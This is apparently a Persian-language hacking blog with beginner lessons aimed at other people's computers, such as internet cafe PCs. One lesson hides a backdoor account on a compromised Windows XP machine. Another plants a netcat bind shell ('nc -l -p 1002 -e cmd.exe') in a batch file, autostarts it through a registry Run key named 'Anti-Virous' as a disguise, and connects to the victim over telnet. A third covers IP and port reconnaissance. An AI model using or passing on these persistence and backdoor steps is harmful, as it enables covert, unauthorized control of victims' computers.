بعد از گرفتن يك دسترسي كامل روي يك سيستم(براي مثال كافي نت) ما نياز داريم يك اكانت مخصوص خودمون بسازيم كه هر وقت خواستيم بتونيم به صورت ادمين وارد اون سيستم شيم اما اينجام اينكار از راه عادي ممكن نيست چون اكانت ساخته شده ي ما براي همه ديده ميشه و سوتي ميديم تابلو ميشيم و اكانتمون بسته ميشه و دست مون كوتاه ميشه و...

براي اينكار يه راه باحال وجود داره شما به صورت عادي يك اكانت بسازيد خواستيد براي اطمينان يه پسورد هم بدهيد از اين راه

Control Panel>>User Accounts>>Create new account

مثلا اكانت ما به اين نام هستش hell gate بعد ميريم تو ران ميزنيم:

Run>>control userpasswords2

بعد روي اكانت hell gate دوبار كليك كرده و group membership (زبانه دوم) را انتخاب مي كنيم قسمت  other را انتخاب كرده حالت backup operators را انتخاب مي كنيم بعد هم ok را ميزنيم

دفعه بعد كه سيستم ريستارت شد اكانت hell gate روي login page ديده نميشود براي وارد شدن به اين اكانت دوبار Alt+Ctrl+Del را ميزنيم بعد در قسمت user name مقدار hell gate و در قسمت password پسورد اكانت را وارد ميكنيم اگه اطلاعاتتون در مورد دسترسي كمه ميتونين در قسمت آرشيو موضوعي قسمت "بالابردن سطح دسترسي" رو يك نيگا بندازين

دمم گرم ايول نه؟نظر بدين تا بازهم بهتون حال بدم اساس درس بعدي طرز وارد شدن به xp بدون دانستن پسورد اگه نظر بدين براتون مي گم

***توجه توجه : هرگونه كپي برداري از اين متن تنها با ذكر منبع مجاز است در غير اينصورت عواقب كار با خودتونه

منبع:         http://outworld-boy.blogfa.com

ايميل: boy_of_outworld_666@yahoo.com

در ادامه درس آموزش ابتدایی هک می رسیم به جایی که باید طریقه گذاشتن بک دور رو تو سیستم هدفتون رو آموزش بدم

شما برای این درس نیاز به برنامه ی نت کت (Net cat) (NC) داريد ميتونيد يه سرچ تو گوگول بكنيد

نت كت داراي سويچ هاي گوناگون و ورژن هاي مختلفي است اگه خواستين بعدا براتون آموزش كامل نت كت رو مي زارم

شما پس از دانلود نتكت آن را روي يك درايو هدف كپي كرده و آن را مخفي كنيد مثلا در درايو C:\    a

بعد يه بچ فايل كنارش بسازيد (همونطوريكه در درسهاي پيش توضيح دادم) داخلش بنويسيد:

Echo off@

c: a@

cd\ a@

nc -l -p 1002 -e cmd.exe@

بعد سيوش كنيد(مثلا Anti.bat) پسوندش يادتون نره بايد bat باشه

خوب حالا برين داخل Start menu>>Run تايپ كنيد regedit بعد اين آدرس را دنبال كنيد:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

بعد داخل پنجره سمت راست كليك راست كنيد و يه داده از نوع string بسازيد يك نام به آن بدهيد مثلا Anti-Virous بعد بعد روش دوبار كليك كنيد پس از باز شدن در قسمت value data آدرس بچ فايلتون رو بنويسيد كه در اين مثال مي شود C:\Anti.bat بعد هم ريجستري را ببنديد سيستم را ريست كرده كار تمام است

حالا چگونه از اين بك دور استفاده كنيم به اين صورت كه ميريم پشت سيستم خودمون وقتي يارو وارد شبكه شد(چه اينترنت چه lan معمولي) با استفاده از تكنيك هاي درس پيش اي پي قرباني را بدست آوريد مثلا ايپي يارو اين بود : 192.185.01.11

بعد دستور زير را اجرا كنيد:

C:\>Telnet  192.185.01.11 1002

بعد از اجراي دستور كامنت پرامپت سيستم هدف روبروي شما ظاهر ميشود حالا با دستورات داس حسابش رو برسين

**توجه:1002 ادرس پورتي است كه شما بخواهيد با آن ارتباط برقرار كنيد شما هرچي خواستيد بزاريد البته در رينج پورتهاي سيستم

**توجه:اين روش راحت لو مي رود چون وقتي سيستم يارو بالا مي آد يه صفحه ي ضايع cmd اتوران شده و ديده مي شود ولي هر كاري راهي داره اگه نظر بدين راه مخفي كردن اين روش رو هم باد ميدم

اين كارو ميتونيد رو سيستم خودتون هم انجام بدين برين تو run تايپ كنيد cmd بعد يه بار ديگه  cmd رو باز كنيد تو يكي بنويسيد nc -l -p 1212 -e cmd.exe بعد توي اون يكي بنويسيد telnet localhost 1212 هالا cmd خودتون براتون باز شد اين براي تمرين بود

دفعه بعد طرز ساختن يك اكانت ويندوز xp رو بهتون ياد ميدم كه تو صفحه اكانتيمگ (همون صفحه آبي اول ويندوز) ديده نمي شود هههههههه

باي

سلام برای شروع به پروژه ی هک اولین چیزی که مهم است بدست آوردن ای پی ادرس و پورتهای باز و برنامه هایی که پشت آنها گوش وایستادن است

من اینجا چندتا از دستورات ابتدایی داس رو برای بدست آوردن ای پی خود ودیگران پورتهای باز خودتون کانکت شدن به اون پورتها گوش وایستادن روی پرت و.. می گم امیدوارم به دردتون بخوره

طريقه باز كردن كامنت پرامپت(همون داس خودمون):

                           Start menu>>Run>>Cmd                                             بعد هم اينتر 

بدست آوردن آی پی آدرس سایتها:

مثال سایت بلاگفا:

C:\Documents and Settings\See You In Hell>ping blogfa.com

Pinging blogfa.com [38.113.162.27] with 32 bytes of data

Reply from 38.113.162.27: bytes=32 time=470ms TTL=112
Reply from 38.113.162.27: bytes=32 time=461ms TTL=112
Reply from 38.113.162.27: bytes=32 time=467ms TTL=112
Reply from 38.113.162.27: bytes=32 time=458ms TTL=112

Ping statistics for 38.113.162.27:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), a

Approximate round trip times in milli-seconds:
    Minimum = 458ms, Maximum = 470ms, Average = 464ms

اون قسمت كه قرمز شده اي پي ادرس بلاگفا مي باشد اون قسمت سبز رنگ نشان دهنده ي زنده بودن(موجود بودن) اي پي سايت ميباشد

بدست آوردن آي پي خود:

C:\Documents and Settings\See You In Hell>ipconfig

Windows IP Configuration:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 216.185.80.232
        Subnet Mask . . . . . . . . . . . : 255.255.255.255
        Default Gateway . . . . . . . . . : 216.185.80.232

اون قسمت قرمز آي پي خودتونه

 براي چك كردن پرتهاي باز سيستم خودتون:

C:\Documents and Settings\See You In Hell>netstat -an

Active Connections

  Proto  Local Addres        Foreign Address           State
  TCP    0.0.0.0:135                  0.0.0.0:0                    LISTENING
  TCP    0.0.0.0:445                  0.0.0.0:0                    LISTENING
  TCP    0.0.0.0:5101                0.0.0.0:0                     LISTENING
  TCP    216.182.23.232:1142     216.155.193.137:5050   ESTABLISHED
  TCP    216.182.23.232:1164     68.142.233.171:501      ESTABLISHED
  TCP    216.182.23.232:1311     64.136.24.165:80         ESTABLISHED
  TCP    216.182.23.232:1349     80.191.163.30:80         CLOSE_WAIT
  TCP    216.182.23.232:1350     80.191.163.30:80         CLOSE_WAIT
  TCP    216.182.23.232:1351     80.191.163.30:80         CLOSE_WAIT
  TCP    216.182.23.232:1352     80.191.163.30:80         CLOSE_WAIT
  ...

پروتو نشان دهنده پروتكل مورد استفاده مي باشد-لوكال آدرس ايپي خودتونه-فورين آدرس آدرس ايپي سيستمي كه از اون پورت باز شما استفاده مي كنه و استيت  نشان دهنده وضعيت پورتها مي باشد كه 3 نوع است ليسنينگ يعني اون پورت باز است و منتظر دستوري مانده است(گوش وايستاده) استبيلشد يعني ارتباطي با اون پورت برقرار شده كلوز ويت رو هم كه حتما متوجه شدين

بدست آوردن اي پي ديگران با همون فرمان بالا زماني كه يك نفر از يه پورت باز شما استفاده كند اي پي او در قسمت فوريت آدرس نمايش داده ميشود(مثلا اگر كسي به شما پي ام دهد پورت ياهوي سيتم شما باز ميشود و ارتباط برقرار ميكن پورتهايي مثه 5050 5051 و... باتجربه خودتون بدست بيارينش)

وصل شدن به يه پورت با استفاده از دستور تلنت ما با يك پورت ارتباط بر قرار ميكنيم اينجوري

C:\>telnet [ip that want to connect] [Port number that open on ip address]a

بياد داشته باشيد:

1-اي پي شما بايد زنده باشد يعني روشن باشد

2-پورت مورد نظر بايد باز باشد

3-من مي خواستم كليه فرامين از داس باشه مي دونم راههاي ساده تري براي اينكار وجود داره

اگه نظر بدين دستورات باز كردن يك پورت در يك سيستم و گذاشتن يك بك دور(محلي براي نفوذ) رو بهتون ياد مي دم فقط بايد نظر بدين